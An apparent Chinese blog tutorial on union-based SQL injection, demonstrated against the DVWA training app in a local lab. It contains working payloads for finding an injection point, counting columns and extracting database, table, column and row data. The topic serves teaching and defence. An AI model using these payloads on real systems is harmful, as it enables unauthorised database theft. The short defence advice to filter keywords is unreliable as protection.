SQL注入漏洞之联合(union)注入

最新推荐文章于 2024-03-10 21:16:17 发布
最新推荐文章于 2024-03-10 21:16:17 发布
阅读量477 收藏
点赞数
文章标签: 网络安全 安全 系统安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71109835/article/details/128828073
版权

SQL注入漏洞之联合(union)注入

学习SQL注入首先要对一些常见的SQL语法有一定的了解,这样我们在使用SQL注入漏洞攻击对方时才能游刃有余。

SQL注入原理:SQL注入之所以得以存在主要是因为WEB应用程序对用户输入的数据没有进行有效的判断和过滤,从而导致用户的恶意SQL语句从前端传到后端,最后实现了对数据的窃取和破环。

首先要实现SQL注入漏洞必须要满足一定的条件。其一,前端传到后端的数据内容是用户可以控制的,如果这些数据不是用户可以控制的话SQL注入漏洞就无从谈起。其二:用户输入的参数可以拼接的SQL语句中,并且可以被执行。

Union联合注入:

  1. 在拿到一个网站后,我们便要判断注入点。首先我们要判断注入点是字符类型还是整型。

下图为演示效果图。

输入id=1时:

输入id=1 and 1=1 和 id=1and 1=2:

由于1=1 为真 1=2 为假,但是页面返回的结果都是为id=1的查询结果。所以注入点的类型应该是字符型,接下来我们验证是否是字符型。

输入id =1’ and ‘1’=’1和id =1’ and ‘1’=’2

我们可以看到当id =1’ and ‘1’=’2是页面没有结果,因此验证了我们的猜想。

  1. 判断该表中的字段数。我们用order by 推测。

在输入id=1’ order by 4#后网页提示没有第四列。

在输入id=1’ order by 2#后网页显示正常。

因此,我们可以判断该表有2列。

  1. 使用union确定可以输入SQL语句的位置。

我们可以看到1,2位置我们可以输入SQL语句。

4、获取数据库名。0' union select database(),2#

  1. 获取当前数据库的所有表名。

0' unionselect (select table_name from information_schema.tables wheretable_schema='dvwa' limit 0,1),2#

我们可以看到第一个表名为guestbook。

  1. 获取表的字段名。

0' union select (select column_name from information_schema.columns wheretable_name='guestbook' and table_schema='dvwa' limit 0,1),2 #

我们可以看到guestbook表的第一个字段名为comment_id。

  1. 获取字段对应的数据。

0' union select(select comment from dvwa.guestbooklimit 0,1),2 #

防御手段:

对用户输入的内容进行的合法性进行判断,过滤掉一些关键词和一些特殊符号比如’ “ ()# 等等。

注:

·本文所有演示均为本地虚拟环境,讲解只是为了读者更好地理解漏洞原理,以达到保护信息安全的目的,请勿用于非法用途!

·严禁利用本文中所提到的技术和漏洞进行非法攻击,否则后果自负,作者将不承担任何责任!

security~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入-union注入union函数 联合注入
07-11 7189
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL注入学习之union联合查询注入
LTNSLALALA的博客
06-13 4188
文章主要是对SQL注入中基于union联合查询注入方式的实践记录。
SQL联合查询注入学习
2301_80034711的博客
03-10 798
SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。4、分类:①GET注入注入点在URL中②POST注入注入点在POST提交的数据中③Head头注入注入点在请求头中①有回显注入(显错注入):执行语句后可以把具体内容反馈出来。
SQL注入联合注入
weixin_52281518的博客
02-03 3105
SQL注入定义 SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQLSQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取数据库的信息以及提权,此时称发生了SQL注入攻击。 数据库基本操作: SQL WHERE语句:select *fr
sql注入联合注入
m0_59576693的博客
09-19 605
sql联合注入联合注入细节以及联合注入流程和联合注入payload
sql注入-联合注入
tlucky的博客
04-10 705
1.第一关 (1)根据提示输入id (2)求闭合字符 使用单引号出现报错,说明闭合字符为单引号 (3)求字段数 为3时显示正常 ,字段数为3 (4)求回显字段 回显字段为2,3 (5)爆数据库名 (6)爆表名 (5)爆列名 (8)爆字段名 2. 第二关 (1)求闭合字符 可判断为数值型注入 (2)确定字段数 字段数为3 (3)确定回显数 回显位为2,3 (4)爆数据库名 (5)爆表名 (6)爆列名 (7)爆字段名 3. 第三关 (1)求注入类型 加)试一下,
SQL注入联合注入
qq_60463414的博客
07-28 348
sql注入笔记 union手工注入
详解SQL注入–安全(二)
01-19
写在前面:在前两天初学SQL注入的基础上,继续在Metasploitable-Linux环境下进行练习。 一、前面学习的SQL注入,那么当然就有防注入。由于web注入危害较大,各种防御技术也层出不穷。 1、程序猿在写代码时会有意识的...
sql injection(SQL注入)教程
10-25
sql injection(SQL注入)教程 1判断有无sql注入漏洞 2union注入 3盲注 4报错注入 5堆叠注入 6二次注入 ...
SQLmap注入工具
09-20
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
SQLMap完成安全测试
03-03
sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项,从数据库指纹、数据获取到访问底层文件系统...
程序员的SQL金典4-8
05-20
 10.1.1 SQL注入漏洞原理  10.1.2 过滤敏感字符  10.1.3 使用参数化SQL  10.2 SQL调优  10.2.1 SQL调优的基本原则  10.2.2 索引  10.2.3 全表扫描和索引查找  10.2.4 优化手法  10.3 事务  10.3.1 事务...
SQL联合注入
黑黑的小鸭的博客
08-09 2191
超详细介绍SQL联合注入,本文使用靶场为sqli-labs less-1;
sql注入中的联合注入
..
12-06 5928
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。 UNION语法 mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。 语法为: select column,...from tabl.
SQL注入---联合注入
qq_41592307的博客
09-03 222
Union联合注入攻击 1、联合注入的思路(会显示输出内容时,才考虑使用Union注入) (可以在输入框中或者URL中输入内容,如果不能在输入框内输入内容,则需要使用Burp suite使用 重发器,修改id中的内容进行爆破数据) 判断是否存在SQL注入点(判断注入的类型) 使用 order by 1-99 语句来检测数据表的字段数量 1.字符型 2.整数型 判断输出的位置,通过联合查询,union select 字段数 ...
1.SQL联合注入
山兔的博客
07-31 221
安全的本质就是开发,又要懂安全又要懂开发,学安全就是开发的一些漏洞,两者相辅相成 一、SQL注入 原理:由于WEB应用程序对用户输入的数据合法性判断不严格导致。 攻击者利用现有应用程序,将恶意的SQL命令注入到程序后台并在数据库引擎执行的能力。 攻击者把SQL命令语句作为输入被服务器SQL解释器正确解析执行,数据库把查询到的结果返回给服务器,然后呈现给攻击者,攻击者由此获得数据库内的数据信息。 1.恶意请求 攻击者在正常查询请求后附加SQL语句请求至服务器(test.php?id=1 and 1=1),WE
SQL注入联合查询注入
qq_45691294的博客
07-11 6945
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
sql注入知识---联合注入
尘玥的故事
04-12 167
username=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘l0ve1ysq1’#&password=123 //得到列名“id,username,password”username=-1’ union select 1,2,3#&password=123 //显示 Hello 2!username=1’&password=123 //报错。
sql注入漏洞的渗透思路
最新发布
03-21
SQL注入漏洞是一种常见的网络安全漏洞,攻击者可以通过该漏洞执行恶意的SQL语句,从而获取、修改或删除数据库中的数据。下面是一种常见的SQL注入渗透思路: 1. 收集目标信息:了解目标网站的结构和使用的数据库类型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值